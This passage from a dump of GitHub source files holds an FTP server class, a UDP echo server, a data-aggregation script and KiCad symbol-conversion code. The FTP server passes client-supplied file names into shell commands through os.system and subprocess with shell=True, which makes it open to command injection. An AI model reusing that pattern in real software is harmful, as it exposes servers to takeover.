finite_difference(x_t, dt, mode=mode)\n if mode == 'backward':\n return x[1:], x_t, x_tt\n elif mode == 'central':\n return x[1:-1], x_t, x_tt\n elif mode == 'backward':\n x_t = (x[1:] - x[:-1]) / dt\n return x[1:], x_t\n elif mode == 'central':\n x_t = (x[2:] - x[:-2]) / (2 * dt)\n return x[1:-1], x_t\n","repo_name":"rdaems/keycld","sub_path":"keycld/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":9134,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"38176688453","text":"# !/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author:ZF\n\n\n# import socketserver\nimport json\nimport subprocess\nimport os\nimport sys\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nimport hashlib\nfrom lib import commons\nfrom conf import settings\n\n\nclass Ftpserver(object):\n USER_DICT = {}\n\n def __init__(self, conn):\n self.request = conn\n\n @staticmethod\n def create_user():\n name = input(\"username:\").strip()\n pwd = input(\"password:\").strip()\n pwd1 = input(\"Re-enter password:\").strip()\n if pwd == pwd1:\n e_flag = False\n while not e_flag:\n t_quota = input(\"请输入磁盘配额(1-500M):\").strip()\n if 1 <= int(t_quota) <= 500:\n disk_quota = int(t_quota) * 1024 * 1024\n home_path = os.path.join(settings.DIR, name)\n print(home_path)\n if not os.path.exists(home_path):\n os.system('mkdir' + ' ' + home_path)\n Ftpserver.USER_DICT = Ftpserver.db_init()\n if Ftpserver.USER_DICT is None:\n Ftpserver.USER_DICT = {}\n if name not in Ftpserver.USER_DICT:\n Ftpserver.USER_DICT[name] = {\n \"action\": '',\n \"username\": name,\n \"password\": commons.md5(pwd),\n \"quota\": disk_quota,\n \"home_dir\": name,\n \"current_dir\": name,\n \"filename\": '',\n \"size\": '',\n \"position\": '',\n \"overridden\": False,\n \"status\": ''\n }\n Ftpserver.db_dump(Ftpserver.USER_DICT)\n 
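# [Editor's aside -- illustrative] In create_user above, the quota entered in
# megabytes is stored in bytes (disk_quota = t_quota * 1024 * 1024), so an
# input of 500 becomes 524,288,000 bytes; `put` later debits received_size
# from that balance:
#   assert 500 * 1024 * 1024 == 524288000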
print(\"用户创建成功!\")\n e_flag = True\n else:\n print(\"用户存在!\")\n e_flag = True\n else:\n print(\"请输入配额范围数值!\")\n else:\n print(\"你的密码两次输入不一致,请重新输入!\")\n\n # def handle(self):\n # # print(self.request, self.client_address, self.server)\n #\n # while True:\n # print(\"wait for request...\")\n # try:\n # data = self.request.recv(1024).strip()\n # # print(\"{} wrote:\".format(self.client_address[0]))\n # print(data)\n # if len(data) == 0:\n # break\n # else:\n # cmd_dic = json.loads(data.decode())\n # action = cmd_dic['action']\n # if hasattr(self, action):\n # func = getattr(self, action)\n # func(cmd_dic)\n # # self.request.send(data.upper())\n # except ConnectionResetError as e:\n # print(\"err\", e)\n # break\n\n def login(self, *args):\n cmd_dic = args[0]\n username = cmd_dic.get('username')\n Ftpserver.USER_DICT = Ftpserver.db_init()\n if username in Ftpserver.USER_DICT:\n if Ftpserver.USER_DICT[username]['password'] == cmd_dic.get('password'):\n print(\"登录成功!\")\n Ftpserver.USER_DICT[username]['status'] = '300'\n print(Ftpserver.USER_DICT)\n self.request.send(bytes(json.dumps(Ftpserver.USER_DICT[username]).encode()))\n pass\n else:\n Ftpserver.USER_DICT[username]['status'] = '301'\n print(\"密码错误,登录失败!\")\n self.request.send(bytes(json.dumps(Ftpserver.USER_DICT[username]).encode()))\n else:\n msg_dic = {\"status\": '302'}\n # Ftpserver.USER_DICT[username]['status'] = '302'\n # print(\"用户不存在���\")\n # self.request.send(b'302')\n self.request.send(bytes(json.dumps(msg_dic).encode()))\n pass\n\n def cd(self, *args):\n cmd_dic = args[0]\n # filename = cmd_dic['filename']\n filename = cmd_dic.get('filename')\n current_dir = cmd_dic.get('current_dir')\n home_dir = cmd_dic.get('home_dir')\n if filename == '..':\n if home_dir == current_dir:\n msg = 'In the current directory for the home directory, cannot change'\n print(msg)\n cmd_dic['status'] = '402'\n cmd_dic['mesg'] = msg\n self.request.send(bytes(json.dumps(cmd_dic).encode()))\n else:\n tmp = os.path.split(current_dir)\n current_dir = tmp[0]\n cmd_dic['current_dir'] = current_dir\n cmd_dic['status'] = '400'\n self.request.send(bytes(json.dumps(cmd_dic).encode()))\n pass\n elif filename == '.':\n cmd_dic['status'] = '400'\n self.request.send(bytes(json.dumps(cmd_dic).encode()))\n\n elif filename.startswith('/'):\n t1 = filename.split('/')\n print(t1)\n if home_dir == t1[1]:\n c_filename = filename.strip('/')\n print(c_filename)\n f_filename = os.path.join(settings.DIR, c_filename)\n print(filename)\n print(f_filename)\n if os.path.isdir(f_filename):\n t = cmd_dic.get('filename')\n cmd_dic['current_dir'] = t.strip('/')\n print(cmd_dic.get('current_dir'))\n cmd_dic['status'] = '400'\n self.request.send(bytes(json.dumps(cmd_dic).encode()))\n pass\n else:\n cmd_dic['status'] = '401'\n print(\"Directory not exsits\")\n self.request.send(bytes(json.dumps(cmd_dic).encode()))\n else:\n cmd_dic['status'] = '401'\n print(\"You have to change the directory is not in your user directory\")\n self.request.send(bytes(json.dumps(cmd_dic).encode()))\n # elif filename.startswith(home_dir):\n # f_filename = os.path.join(settings.DIR, filename)\n # print(filename)\n # print(f_filename)\n # if os.path.isdir(f_filename):\n # cmd_dic['current_dir'] = os.path.join(current_dir, filename)\n # print(cmd_dic.get('current_dir'))\n # cmd_dic['status'] = '400'\n # self.request.send(bytes(json.dumps(cmd_dic).encode()))\n # pass\n # else:\n # cmd_dic['status'] = '401'\n # print(\"Directory not exsits\")\n # self.request.send(bytes(json.dumps(cmd_dic).encode()))\n else:\n 
\n    def cd(self, *args):\n        cmd_dic = args[0]\n        # filename = cmd_dic['filename']\n        filename = cmd_dic.get('filename')\n        current_dir = cmd_dic.get('current_dir')\n        home_dir = cmd_dic.get('home_dir')\n        if filename == '..':\n            if home_dir == current_dir:\n                msg = 'Current directory is already the home directory, cannot go up'\n                print(msg)\n                cmd_dic['status'] = '402'\n                cmd_dic['mesg'] = msg\n                self.request.send(bytes(json.dumps(cmd_dic).encode()))\n            else:\n                tmp = os.path.split(current_dir)\n                current_dir = tmp[0]\n                cmd_dic['current_dir'] = current_dir\n                cmd_dic['status'] = '400'\n                self.request.send(bytes(json.dumps(cmd_dic).encode()))\n                pass\n        elif filename == '.':\n            cmd_dic['status'] = '400'\n            self.request.send(bytes(json.dumps(cmd_dic).encode()))\n\n        elif filename.startswith('/'):\n            t1 = filename.split('/')\n            print(t1)\n            if home_dir == t1[1]:\n                c_filename = filename.strip('/')\n                print(c_filename)\n                f_filename = os.path.join(settings.DIR, c_filename)\n                print(filename)\n                print(f_filename)\n                if os.path.isdir(f_filename):\n                    t = cmd_dic.get('filename')\n                    cmd_dic['current_dir'] = t.strip('/')\n                    print(cmd_dic.get('current_dir'))\n                    cmd_dic['status'] = '400'\n                    self.request.send(bytes(json.dumps(cmd_dic).encode()))\n                    pass\n                else:\n                    cmd_dic['status'] = '401'\n                    print(\"Directory does not exist\")\n                    self.request.send(bytes(json.dumps(cmd_dic).encode()))\n            else:\n                cmd_dic['status'] = '401'\n                print(\"The target directory is not under your user directory\")\n                self.request.send(bytes(json.dumps(cmd_dic).encode()))\n        # elif filename.startswith(home_dir):\n        #     f_filename = os.path.join(settings.DIR, filename)\n        #     print(filename)\n        #     print(f_filename)\n        #     if os.path.isdir(f_filename):\n        #         cmd_dic['current_dir'] = os.path.join(current_dir, filename)\n        #         print(cmd_dic.get('current_dir'))\n        #         cmd_dic['status'] = '400'\n        #         self.request.send(bytes(json.dumps(cmd_dic).encode()))\n        #         pass\n        #     else:\n        #         cmd_dic['status'] = '401'\n        #         print(\"Directory does not exist\")\n        #         self.request.send(bytes(json.dumps(cmd_dic).encode()))\n        else:\n            tmp_str = filename.strip('/')\n            t_list = tmp_str.split('/')\n            print(t_list)\n            print(settings.DIR)\n            print(home_dir)\n            print(tmp_str)\n            if len(t_list) == 1:\n                f_filename = os.path.join(settings.DIR, home_dir, tmp_str)\n                print(f_filename)\n                if os.path.isdir(f_filename):\n                    cmd_dic['current_dir'] = os.path.join(current_dir, filename)\n                    print(cmd_dic.get('current_dir'))\n                    cmd_dic['status'] = '400'\n                    self.request.send(bytes(json.dumps(cmd_dic).encode()))\n                    pass\n                else:\n                    cmd_dic['status'] = '401'\n                    print(\"The target directory is not under your user directory\")\n                    self.request.send(bytes(json.dumps(cmd_dic).encode()))\n            elif len(t_list) > 1:\n                if home_dir == t_list[0]:\n                    f_filename = os.path.join(settings.DIR, tmp_str)\n                    print(f_filename)\n                    if os.path.isdir(f_filename):\n                        cmd_dic['current_dir'] = filename\n                        print(cmd_dic.get('current_dir'))\n                        cmd_dic['status'] = '400'\n                        self.request.send(bytes(json.dumps(cmd_dic).encode()))\n                        pass\n                    else:\n                        cmd_dic['status'] = '401'\n                        print(\"Directory does not exist\")\n                        self.request.send(bytes(json.dumps(cmd_dic).encode()))\n                else:\n                    msg = 'The target directory is not under your user directory'\n                    cmd_dic['status'] = '402'\n                    cmd_dic['mesg'] = msg\n                    self.request.send(bytes(json.dumps(cmd_dic).encode()))\n\n    def ls(self, *args):\n        cmd_dic = args[0]\n        if 'filename' in cmd_dic:\n            filename = cmd_dic.get('filename')\n            current_dir = os.path.join(settings.DIR, cmd_dic.get('current_dir'), filename)\n            print(current_dir)\n            if os.path.isdir(current_dir):\n                cmd_str = 'ls' + ' ' + current_dir\n                print(filename, current_dir)\n                p = subprocess.Popen(cmd_str, shell=True, stdout=subprocess.PIPE)\n                res = p.stdout.read()\n                if len(res) == 0:\n                    send_data = 'The directory is empty'\n                    mesg_dic = {\"mesg\": send_data, \"size\": len(send_data), \"res\": 0}\n                    self.request.send(bytes(json.dumps(mesg_dic).encode()))\n                    #self.request.send(bytes(send_data.encode()))\n                else:\n                    msg_dic = {\n                        \"size\": len(res),\n                        \"res\": len(res)\n                    }\n                    self.request.send(bytes(json.dumps(msg_dic).encode()))\n                    c_response = self.request.recv(1024)\n                    if c_response == b'100':\n                        # print(res)\n                        send_data = str(res, encoding='utf-8')\n                        print(send_data)\n                        self.request.send(bytes(send_data.encode()))\n            else:\n                msg = \"The directory does not exist\"\n                print(msg)\n                mesg_dic = {\"mesg\": msg, \"size\": len(msg), \"res\": 0}\n                self.request.send(bytes(json.dumps(mesg_dic).encode()))\n                #self.request.send(bytes(msg.encode()))\n\n    def mkdir(self, *args):\n        cmd_dic = args[0]\n        if 'filename' in cmd_dic:\n            filename = cmd_dic.get('filename')\n            # t_dir = os.path.join(settings.DIR, cmd_dic.get('current_dir'))\n            # new_dir = os.path.join(t_dir, filename)\n            new_dir = os.path.join(settings.DIR, cmd_dic.get('current_dir'), filename)\n            print(new_dir)\n            if os.path.isdir(new_dir):\n                self.request.send(b'99')\n                print(\"The path already exists!\")\n            else:\n                cmd_str = 'mkdir' + ' ' + new_dir\n                p = subprocess.Popen(cmd_str, shell=True, stdout=subprocess.PIPE)\n                res = p.stdout.read()\n                if len(res) == 0:\n                    self.request.send(b'100')\n                    print(\"directory created successfully!\")\n
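# [Editor's aside -- design note with an illustrative sketch] `ls` and `mkdir`
# above shell out via subprocess.Popen; capturing output through PIPE works
# like this:
#   import subprocess
#   res = subprocess.Popen("ls /tmp", shell=True,
#                          stdout=subprocess.PIPE).stdout.read()
# (shell=True interprets the command string, which assumes trusted input --
# a hostile filename could otherwise inject shell syntax.)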
\n    def put(self, *args):\n        cmd_dic = args[0]\n        current_dir = cmd_dic.get('current_dir')\n        # home_dir = cmd_dic['home_dir']\n        filename = os.path.join(settings.DIR, current_dir, cmd_dic.get('filename'))\n        print(filename)\n        filesize = cmd_dic.get('size')\n        username = cmd_dic.get('username')\n        t = Ftpserver.USER_DICT[username]['quota']\n        print(t)\n        user_quota = int(Ftpserver.USER_DICT[username]['quota'])\n        print(user_quota)\n        if os.path.isfile(filename):  # check whether the uploaded file already exists\n            e_filesize = os.stat(filename).st_size\n            print(e_filesize)\n            if e_filesize == filesize:  # check whether the upload and the existing file are the same size\n                msg = \"The file already exists\"\n                msg_dic = {\n                    \"action\": \"put\",\n                    \"filename\": filename,\n                    \"size\": filesize,\n                    \"position\": '',\n                    \"overridden\": False,\n                    \"current_dir\": current_dir,\n                    \"msg\": msg,\n                    \"status\": '206'\n                }\n                self.request.send(bytes(json.dumps(msg_dic).encode('utf-8')))\n                r_data = json.loads(self.request.recv(1024).decode())\n                if r_data['overridden']:  # check whether the existing file should be overwritten\n                    f = open(filename, 'wb')\n                    r_data['status'] = '200'\n                    self.request.send(bytes(json.dumps(r_data).encode('utf-8')))  # better to reply in JSON here too, so status codes etc. can be included\n                    received_size = 0\n                    m = hashlib.md5()\n                    while received_size < filesize:\n                        if filesize - received_size > 1024:\n                            size = 1024\n                        else:\n                            size = filesize - received_size\n                        data = self.request.recv(size)\n                        f.write(data)\n                        received_size += len(data)\n                        m.update(data)\n                    else:\n                        self.request.send(bytes(m.hexdigest().encode()))  # send the MD5 digest\n                        f.close()\n                        print(\"file received successfully\")\n                    pass\n                else:\n                    pass\n            elif e_filesize < cmd_dic.get('size'):  # the existing file is smaller than the upload, i.e. the previous transfer was incomplete\n                f = open(filename, 'ab')\n                f_position = f.tell()\n                print(f_position)\n                msg_dic = {\n                    \"action\": \"put\",\n                    \"filename\": filename,\n                    \"size\": filesize,\n                    \"position\": f_position,\n                    \"overridden\": False,\n                    \"current_dir\": current_dir,\n                    \"msg\": '',\n                    \"status\": '207',\n                    \"quota\": ''\n                }\n                self.request.send(bytes(json.dumps(msg_dic).encode('utf-8')))\n                # r_data = json.loads(self.request.recv(1024))\n                # f = open(filename, 'ab')\n                received_size = f_position\n                m = hashlib.md5()\n                while received_size < filesize:\n                    if filesize - received_size > 1024:\n                        size = 1024\n                    else:\n                        size = filesize - received_size\n                    data = self.request.recv(size)\n                    f.seek(f_position)  # seek to the resume position\n                    f.write(data)  # write starting from the resume position\n                    received_size += len(data)\n                    m.update(data)\n                else:\n                    self.request.send(bytes(m.hexdigest().encode()))\n                    f.close()\n                    Ftpserver.USER_DICT[username]['quota'] = user_quota - received_size\n                    Ftpserver.db_dump(Ftpserver.USER_DICT)\n                    print(\"file received successfully\")\n                pass\n        else:\n            if user_quota >= filesize:  # check the remaining disk quota covers the upload size\n                f = open(filename, 'wb')\n                # print(\"file not exist\", filename)\n                msc_dic = {\"status\": '200'}\n                self.request.send(bytes(json.dumps(msc_dic).encode('utf-8')))  # better to reply in JSON here too, so status codes etc. can be included\n                received_size = 0\n                m = hashlib.md5()\n                while received_size < filesize:\n                    data = self.request.recv(1024)\n                    f.write(data)\n                    received_size += len(data)\n                    m.update(data)\n                else:\n                    self.request.send(bytes(m.hexdigest().encode()))\n                    f.close()\n                    Ftpserver.USER_DICT[username]['quota'] = user_quota - received_size\n                    Ftpserver.db_dump(Ftpserver.USER_DICT)\n                    # file_md5 = self.request.recv(1024)\n                    # if file_md5.decode() == m.hexdigest():\n                    print(\"file received successfully\")\n            elif user_quota < filesize:\n                msg = '''\n                Disk quota remaining space %d, the quota is not enough, please contact the administrator!\n\n                ''' % user_quota\n                msg_dic = {\n                    \"action\": \"put\",\n                    \"filename\": filename,\n                    \"size\": filesize,\n                    \"position\": '',\n                    \"overridden\": False,\n                    \"current_dir\": current_dir,\n                    \"msg\": msg,\n                    \"status\": '208',\n                    \"quota\": user_quota\n                }\n                self.request.send(bytes(json.dumps(msg_dic).encode('utf-8')))\n
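# [Editor's aside -- illustrative sketch of the integrity check used above]
# Both sides hash the stream incrementally, so no file ever has to fit in
# memory at once:
#   import hashlib
#   m = hashlib.md5()
#   for chunk in (b"part1", b"part2"):   # e.g. successive recv(1024) payloads
#       m.update(chunk)
#   digest = m.hexdigest()               # compared against the peer's digest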
\n    def get(self, *args):\n        cmd_dic = args[0]\n        filename = cmd_dic.get('filename')\n        current_dir = cmd_dic.get('current_dir')\n        tmp = filename.split('/')\n        # c_filesize = cmd_dic['filesize']\n\n        if len(tmp) == 1:\n            f_filename = os.path.join(settings.DIR, current_dir, filename)\n        else:\n            f_filename = os.path.join(settings.DIR, filename)\n        print(f_filename)\n        if os.path.isfile(f_filename):  # the file exists on the server\n            filesize = os.stat(f_filename).st_size\n            if cmd_dic.get('status') == '199':  # check whether this is a resume request\n                msg_dic = {\n                    \"action\": \"get\",\n                    \"filename\": filename,\n                    \"size\": filesize,\n                    \"status\": '200'\n                }\n                self.request.send(bytes(json.dumps(msg_dic).encode(\"utf-8\")))\n                client_response = self.request.recv(1024)\n                print(client_response)\n                if client_response == b'ok':\n                    f = open(f_filename, 'rb')\n                    f.seek(cmd_dic.get('position'))\n                    m = hashlib.md5()\n                    for line in f:\n                        m.update(line)\n                        self.request.sendall(line)\n                    f.close()\n                    client_response1 = self.request.recv(1024)\n                    if client_response1 == b'finish':\n                        self.request.send(bytes(m.hexdigest().encode('utf-8')))\n                        print(\"file send finish!\")\n            else:  # send the whole file\n                filesize = os.stat(f_filename).st_size\n                msg_dic = {\n                    \"action\": \"get\",\n                    \"filename\": filename,\n                    \"size\": filesize,\n                    \"status\": '200'\n                }\n                self.request.send(bytes(json.dumps(msg_dic).encode(\"utf-8\")))\n                client_response = self.request.recv(1024)\n                if client_response == b'ok':\n                    f = open(f_filename, 'rb')\n                    m = hashlib.md5()\n                    for line in f:\n                        m.update(line)\n                        self.request.sendall(line)\n                    f.close()\n                    client_response1 = self.request.recv(1024)\n                    if client_response1 == b'finish':\n                        self.request.send(bytes(m.hexdigest().encode('utf-8')))\n                        print(\"file send finish!\")\n        else:  # the file does not exist on the server\n            msg = \"file does not exist!\"\n            print(msg)\n            msg_dic = {\"status\": '202', \"mesg\": msg}\n            self.request.send(bytes(json.dumps(msg_dic).encode(\"utf-8\")))\n\n    @staticmethod\n    def db_init():\n        \"\"\"\n        Read the whole user-config file\n        :return:\n        \"\"\"\n        if os.path.exists(os.path.join(settings.Data_DIR, 'userinfo')):\n            with open(os.path.join(settings.Data_DIR, 'userinfo'), 'r') as f:\n                d_dict = json.load(f)\n                return d_dict\n\n    @staticmethod\n    def db_dump(d_dict):\n        \"\"\"\n        Write the whole user-config file\n        :param d_dict:\n        :return:\n        \"\"\"\n        with open(os.path.join(settings.Data_DIR, 'userinfo'), 'w') as f:\n            json.dump(d_dict, f)\n        return True\n\n\n# if __name__ == \"__main__\":\n#     info = '''\n#     1. Create an FTP user\n#     2. Run the FTP service\n#     '''\n#     print(info)\n#     inp = input(\"Enter an option number:\")\n#     if inp == '1':\n#         Ftpserver.create_user()\n#     elif inp == '2':\n#         # HOST, PORT = \"0.0.0.0\", 9999\n#         HOST, PORT = \"localhost\", 9999\n#         # Create the server, binding to localhost on port 9999\n#         # server1 = socketserver.ThreadingTCPServer((HOST, PORT), Ftpserver)\n#         print(\"FTPserver is running\")\n#         # server1.serve_forever()\n#     else:\n#         print(\"Please enter a valid option number!\")\n","repo_name":"KC9226/ftp_v6","sub_path":"ftp_server/lib/ftpclass.py","file_name":"ftpclass.py","file_ext":"py","file_size_in_byte":21330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25481588484","text":"import socket\n\nSERVER_HOST = \"127.0.0.1\"\nSERVER_PORT = 8080\n\ndef main():\n    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n    sock.bind((SERVER_HOST, SERVER_PORT))\n    print(\"[Server] Server started.\")\n    print(\"[Server] Waiting for connection...\")\n\n    while True:\n        data, client_addr = sock.recvfrom(100)\n        print(\"[Server] Client%s:%s: \" % client_addr, end=\":\")\n        data = data.decode(\"UTF8\")\n        print(data)\n        if data == \"exit\":\n            sock.sendto(\"exit\".encode(\"UTF8\"), client_addr)  # fixed: sendto requires the destination address\n            break\n        else:\n            sock.sendto(data.encode(\"UTF8\"), client_addr)\n    \n    sock.close()\n\nif __name__ == \"__main__\":\n    
main()","repo_name":"xdai02/Computer_Networking","sub_path":"code/Python/Chapter2/2-8/udp_server.py","file_name":"udp_server.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"24398408877","text":"import sys\nsys.path.append(\"..\")\nfrom pcm_segmenter import postprocess, io\nimport pandas\n\nEXCEL_FILES = (\"pipeline_2018-06-13.xlsx\",\n \"pipeline_2018-07-26.xlsx\",\n \"pipeline_2018-08-08.xlsx\",\n \"pipeline_2018-09-07.xlsx\",\n \"pipeline_2018-09-21.xlsx\",\n \"pipeline_2018-10-04.xlsx\")\n\nOUTPUT_FILE = \"manuscript_analyses_aggregated\"\n\ncombined_dataframe = io.read_dataframe_from_excel(name=EXCEL_FILES[0], directory=\".\")\nfor file in EXCEL_FILES[1:]:\n dataframe = io.read_dataframe_from_excel(name=file, directory=\".\")\n combined_dataframe = postprocess.concatenate_pandas_dataframes([combined_dataframe, dataframe])\n\nio.write_results_to_excel(combined_dataframe, name=OUTPUT_FILE, directory=\".\")\n","repo_name":"siboles/pcm_segmenter","sub_path":"scripts/manuscript_postprocess.py","file_name":"manuscript_postprocess.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21205166410","text":"# Global imports\nimport logging\nfrom typing import Callable, List, Tuple, Union\n\nfrom easyeda2kicad.easyeda.parameters_easyeda import (\n EasyedaPinType,\n EeSymbol,\n EeSymbolArc,\n EeSymbolBbox,\n EeSymbolCircle,\n EeSymbolEllipse,\n EeSymbolPath,\n EeSymbolPin,\n EeSymbolPolygon,\n EeSymbolPolyline,\n EeSymbolRectangle,\n)\nfrom easyeda2kicad.easyeda.svg_path_parser import SvgPathEllipticalArc, SvgPathMoveTo\nfrom easyeda2kicad.helpers import get_middle_arc_pos\nfrom easyeda2kicad.kicad.export_kicad_footprint import compute_arc\nfrom easyeda2kicad.kicad.parameters_kicad_symbol import *\n\nee_pin_type_to_ki_pin_type = {\n EasyedaPinType.unspecified: KiPinType.unspecified,\n EasyedaPinType._input: KiPinType._input,\n EasyedaPinType.output: KiPinType.output,\n EasyedaPinType.bidirectional: KiPinType.bidirectional,\n EasyedaPinType.power: KiPinType.power_in,\n}\n\n\ndef px_to_mil(dim: Union[int, float]) -> int:\n return int(10 * dim)\n\n\ndef px_to_mm(dim: Union[int, float]) -> float:\n return 10.0 * dim * 0.0254\n\n\ndef convert_ee_pins(\n ee_pins: List[EeSymbolPin], ee_bbox: EeSymbolBbox, kicad_version: KicadVersion\n) -> List[KiSymbolPin]:\n\n to_ki: Callable = px_to_mil if kicad_version == KicadVersion.v5 else px_to_mm\n # pin_spacing = (\n # KiExportConfigV5.PIN_SPACING.value\n # if kicad_version == KicadVersion.v5\n # else KiExportConfigV6.PIN_SPACING.value\n # )\n\n kicad_pins = []\n for ee_pin in ee_pins:\n pin_length = abs(int(float(ee_pin.pin_path.path.split(\"h\")[-1])))\n\n ki_pin = KiSymbolPin(\n name=ee_pin.name.text.replace(\" \", \"\"),\n number=ee_pin.settings.spice_pin_number.replace(\" \", \"\"),\n style=KiPinStyle.line,\n length=to_ki(pin_length),\n type=ee_pin_type_to_ki_pin_type[ee_pin.settings.type],\n orientation=ee_pin.settings.rotation,\n pos_x=to_ki(int(ee_pin.settings.pos_x) - int(ee_bbox.x)),\n pos_y=-to_ki(int(ee_pin.settings.pos_y) - int(ee_bbox.y)),\n )\n\n if ee_pin.dot.is_displayed and ee_pin.clock.is_displayed:\n ki_pin.style = KiPinStyle.inverted_clock\n elif ee_pin.dot.is_displayed:\n ki_pin.style = KiPinStyle.inverted\n elif ee_pin.clock.is_displayed:\n ki_pin.style = KiPinStyle.clock\n\n # Deal with different pin length\n # if 
ee_pin.settings.rotation == 0:\n # ki_pin.pos_x -= to_ki(pin_length) - pin_spacing\n # elif ee_pin.settings.rotation == 180:\n # ki_pin.pos_x += to_ki(pin_length) - pin_spacing\n # elif ee_pin.settings.rotation == 90:\n # ki_pin.pos_y -= to_ki(pin_length) - pin_spacing\n # elif ee_pin.settings.rotation == 270:\n # ki_pin.pos_y += to_ki(pin_length) - pin_spacing\n\n kicad_pins.append(ki_pin)\n\n return kicad_pins\n\n\ndef convert_ee_rectangles(\n ee_rectangles: List[EeSymbolRectangle],\n ee_bbox: EeSymbolBbox,\n kicad_version: KicadVersion,\n) -> List[KiSymbolRectangle]:\n\n to_ki: Callable = px_to_mil if kicad_version == KicadVersion.v5 else px_to_mm\n\n kicad_rectangles = []\n for ee_rectangle in ee_rectangles:\n ki_rectangle = KiSymbolRectangle(\n pos_x0=to_ki(int(ee_rectangle.pos_x) - int(ee_bbox.x)),\n pos_y0=-to_ki(int(ee_rectangle.pos_y) - int(ee_bbox.y)),\n )\n ki_rectangle.pos_x1 = to_ki(int(ee_rectangle.width)) + ki_rectangle.pos_x0\n ki_rectangle.pos_y1 = -to_ki(int(ee_rectangle.height)) + ki_rectangle.pos_y0\n\n kicad_rectangles.append(ki_rectangle)\n\n return kicad_rectangles\n\n\ndef convert_ee_circles(\n ee_circles: List[EeSymbolCircle], ee_bbox: EeSymbolBbox, kicad_version: KicadVersion\n):\n to_ki: Callable = px_to_mil if kicad_version == KicadVersion.v5 else px_to_mm\n\n return [\n KiSymbolCircle(\n pos_x=to_ki(int(ee_circle.center_x) - int(ee_bbox.x)),\n pos_y=-to_ki(int(ee_circle.center_y) - int(ee_bbox.y)),\n radius=to_ki(ee_circle.radius),\n background_filling=ee_circle.fill_color,\n )\n for ee_circle in ee_circles\n ]\n\n\ndef convert_ee_ellipses(\n ee_ellipses: List[EeSymbolEllipse],\n ee_bbox: EeSymbolBbox,\n kicad_version: KicadVersion,\n) -> List[KiSymbolCircle]:\n to_ki: Callable = px_to_mil if kicad_version == KicadVersion.v5 else px_to_mm\n\n # Ellipses are not supported in Kicad -> If it's not a real ellipse, but just a circle\n return [\n KiSymbolCircle(\n pos_x=to_ki(int(ee_ellipses.center_x) - int(ee_bbox.x)),\n pos_y=-to_ki(int(ee_ellipses.center_y) - int(ee_bbox.y)),\n radius=to_ki(ee_ellipses.radius_x),\n )\n for ee_ellipses in ee_ellipses\n if ee_ellipses.radius_x == ee_ellipses.radius_y\n ]\n\n\ndef convert_ee_arcs(\n ee_arcs: List[EeSymbolArc], ee_bbox: EeSymbolBbox, kicad_version: KicadVersion\n) -> List[KiSymbolArc]:\n to_ki: Callable = px_to_mil if kicad_version == KicadVersion.v5 else px_to_mm\n\n kicad_arcs = []\n for ee_arc in ee_arcs:\n if not (\n isinstance(ee_arc.path[0], SvgPathMoveTo)\n or isinstance(ee_arc.path[1], SvgPathEllipticalArc)\n ):\n logging.error(\"Can't convert this arc\")\n else:\n ki_arc = KiSymbolArc(\n radius=to_ki(\n max(ee_arc.path[1].radius_x, ee_arc.path[1].radius_y)\n ), # doesn't support elliptical arc\n angle_start=ee_arc.path[1].x_axis_rotation,\n start_x=to_ki(ee_arc.path[0].start_x - ee_bbox.x),\n start_y=to_ki(ee_arc.path[0].start_y - ee_bbox.y),\n end_x=to_ki(ee_arc.path[1].end_x - ee_bbox.x),\n end_y=to_ki(ee_arc.path[1].end_y - ee_bbox.y),\n )\n\n center_x, center_y, angle_end = compute_arc(\n start_x=ki_arc.start_x,\n start_y=ki_arc.start_y,\n radius_x=to_ki(ee_arc.path[1].radius_x),\n radius_y=to_ki(ee_arc.path[1].radius_y),\n angle=ki_arc.angle_start,\n large_arc_flag=ee_arc.path[1].flag_large_arc,\n sweep_flag=ee_arc.path[1].flag_sweep,\n end_x=ki_arc.end_x,\n end_y=ki_arc.end_y,\n )\n ki_arc.center_x = center_x\n ki_arc.center_y = center_y if ee_arc.path[1].flag_large_arc else -center_y\n ki_arc.angle_end = (\n (360 - angle_end) if ee_arc.path[1].flag_large_arc else angle_end\n )\n\n ki_arc.middle_x, 
ki_arc.middle_y = get_middle_arc_pos(\n center_x=ki_arc.center_x,\n center_y=ki_arc.center_y,\n radius=ki_arc.radius,\n angle_start=ki_arc.angle_start,\n angle_end=ki_arc.angle_end,\n )\n\n ki_arc.start_y = (\n ki_arc.start_y if ee_arc.path[1].flag_large_arc else -ki_arc.start_y\n )\n ki_arc.end_y = (\n ki_arc.end_y if ee_arc.path[1].flag_large_arc else -ki_arc.end_y\n )\n\n kicad_arcs.append(ki_arc)\n\n return kicad_arcs\n\n\ndef convert_ee_polylines(\n ee_polylines: List[Union[EeSymbolPolyline, EeSymbolPolygon]],\n ee_bbox: EeSymbolBbox,\n kicad_version: KicadVersion,\n) -> List[KiSymbolPolygon]:\n\n to_ki: Callable = px_to_mil if kicad_version == KicadVersion.v5 else px_to_mm\n kicad_polygons = []\n for ee_polyline in ee_polylines:\n raw_pts = ee_polyline.points.split(\" \")\n # print(raw_pts)\n x_points = [\n to_ki(int(float(raw_pts[i])) - int(ee_bbox.x))\n for i in range(0, len(raw_pts), 2)\n ]\n y_points = [\n -to_ki(int(float(raw_pts[i])) - int(ee_bbox.y))\n for i in range(1, len(raw_pts), 2)\n ]\n\n if isinstance(ee_polyline, EeSymbolPolygon) or ee_polyline.fill_color:\n x_points.append(x_points[0])\n y_points.append(y_points[0])\n\n kicad_polygon = KiSymbolPolygon(\n points=[\n [x_points[i], y_points[i]]\n for i in range(min(len(x_points), len(y_points)))\n ],\n points_number=min(len(x_points), len(y_points)),\n is_closed=x_points[0] == x_points[-1] and y_points[0] == y_points[-1],\n )\n\n kicad_polygons.append(kicad_polygon)\n\n return kicad_polygons\n\n\ndef convert_ee_polygons(\n ee_polygons: List[EeSymbolPolygon],\n ee_bbox: EeSymbolBbox,\n kicad_version: KicadVersion,\n) -> List[KiSymbolPolygon]:\n return convert_ee_polylines(\n 